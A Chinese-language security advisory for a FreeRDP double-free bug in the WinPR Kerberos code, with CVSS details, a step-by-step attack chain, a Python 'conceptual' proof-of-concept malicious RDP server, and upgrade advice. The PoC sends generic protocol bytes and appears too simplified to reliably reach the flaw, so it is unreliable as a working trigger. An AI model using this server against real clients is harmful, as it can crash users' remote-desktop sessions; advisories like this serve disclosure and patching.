CVE-2026-33995 FreeRDP双重释放漏洞

漏洞信息

漏洞编号

CVE-2026-33995

漏洞类型

双重释放

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FreeRDP

漏洞概述

FreeRDP是一个远程桌面协议的免费实现。在3.24.2版本之前，WinPR库中的Kerberos处理函数存在双重释放漏洞。该漏洞影响配置了Kerberos的系统，攻击者可通过网络触发失败的认证尝试，在NLA连接断开时导致客户端崩溃。该问题已在3.24.2版本中修复。

技术细节

该漏洞位于FreeRDP项目的WinPR库核心文件winpr/libwinpr/sspi/Kerberos/kerberos.c中。具体而言，kerberos_AcceptSecurityContext()和kerberos_InitializeSecurityContextA()函数存在逻辑缺陷，导致对同一内存指针进行了两次释放操作。当FreeRDP客户端运行在配置了Kerberos认证（例如Samba AD成员服务器或使用krb5的NFS环境）的系统上时，如果启用了网络级认证（NLA），攻击者可以通过网络诱导客户端连接并故意制造认证失败。随后，在NLA连接拆除阶段，程序会调用存在缺陷的清理函数，触发双重释放异常。由于CVSS向量为AV:N/AC:L/PR:N/UI:N，攻击者无需任何权限或用户交互即可远程触发此漏洞，导致目标客户端进程崩溃，造成拒绝服务。

攻击链分析

STEP 1

侦察

攻击者扫描网络，寻找使用FreeRDP作为客户端且开启了Kerberos或NLA认证的目标。

STEP 2

搭建恶意服务

攻击者准备一个恶意的RDP服务器，该服务器配置为在NLA协商阶段故意返回认证失败或异常数据包。

STEP 3

诱导连接

通过社会工程学或中间人攻击手段，诱导受害者使用FreeRDP客户端连接到攻击者的恶意服务器。

STEP 4

触发漏洞

当FreeRDP客户端尝试进行Kerberos认证并失败，随后进行NLA连接拆除时，触发WinPR库中的双重释放漏洞。

STEP 5

系统崩溃

由于内存管理错误，FreeRDP客户端进程崩溃，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# Conceptual PoC for CVE-2026-33995 (FreeRDP Double Free)
# This script simulates a malicious RDP server that triggers the crash
# during NLA connection teardown after a failed authentication attempt.

def run_malicious_server(host='0.0.0.0', port=3389):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(1)
    print(f"[*] Listening on {host}:{port}...")
    
    conn, addr = server_socket.accept()
    print(f"[*] Connection accepted from {addr}")
    
    try:
        # 1. Receive Client Initial Connection Request
        # Standard RDP connection sequence starts with X.224
        data = conn.recv(1024)
        
        # 2. Send Server Connection Confirm (Negotiation)
        # Indicating support for Standard Security or NLA
        # This is a simplified response to move to the NLA phase
        response = b"\x03\x00\x00\x0b\x06\xe0\x00\x00\x00\x00\x00"
        conn.send(response)
        
        # 3. Receive Client NLA (Kerberos) Token
        # In a real scenario, this contains the Kerberos AP_REQ
        nla_data = conn.recv(4096)
        
        # 4. Trigger the Vulnerability
        # The double-free occurs during the teardown of a failed NLA connection.
        # We simulate a failure condition. The specific packet sequence
        # that forces the double-free involves sending an error or
        # closing the connection unexpectedly after the client has sent
        # Kerberos data, causing the WinPR Kerberos context to be freed twice.
        
        print("[*] Sending failure response to trigger teardown...")
        
        # Sending a generic failure or closing the socket to force cleanup
        # The vulnerability specifically triggers in kerberos_InitializeSecurityContextA
        # when handling the error state during cleanup.
        error_pdu = b"\x03\x00\x00\x0c\x02\xf0\x80\x00\x00\x00\x00\x00" # Example Error PDU
        conn.send(error_pdu)
        
        # Close connection to force cleanup logic on client side
        conn.close()
        print("[*] Connection closed. If the client is vulnerable, it should have crashed.")
        
    except Exception as e:
        print(f"[-] An error occurred: {e}")
    finally:
        server_socket.close()

if __name__ == "__main__":
    run_malicious_server()

影响范围

FreeRDP < 3.24.2

防御指南

临时缓解措施

建议用户立即将FreeRDP升级至3.24.2或更高版本以修补该双重释放漏洞。在无法立即升级的情况下，作为临时缓解措施，可以在受影响的系统中暂时禁用Kerberos认证或网络级认证（NLA），但这可能会降低安全性并影响Samba AD等特定环境的正常功能。